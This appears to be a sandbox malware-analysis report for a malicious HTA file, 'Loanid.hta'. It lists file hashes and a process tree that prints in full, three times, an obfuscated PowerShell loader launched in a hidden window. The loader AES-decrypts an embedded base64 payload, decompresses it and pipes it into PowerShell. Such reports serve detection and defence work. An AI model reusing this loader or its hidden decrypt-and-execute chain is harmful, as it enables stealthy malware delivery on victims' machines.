popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Loanid.hta

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 28, 2023, 1:44 p.m. May 28, 2023, 2:18 p.m.
Size 33.1KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 e4724a4c6ff4dcd664e2ada4c110b2a9
SHA256 b2c5c6a27cf0d5242517bc57db63ecb29768a5dbb4af07f811b6bd988d2a987c
CRC32 554EE1EA
ssdeep 384:7Vv8DXZVodRVnLHrIMaSXl2SbhgYNQ0Hgc5v3EDe5fGHJ3RiOUZDCnjXepTqovDW:7XjJkkMT4qADjdFIzfCIHnT
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Loanid.hta

    2552

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - }

      2648

      • cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -

        2784

        • powershell.exe powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs

          2884

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

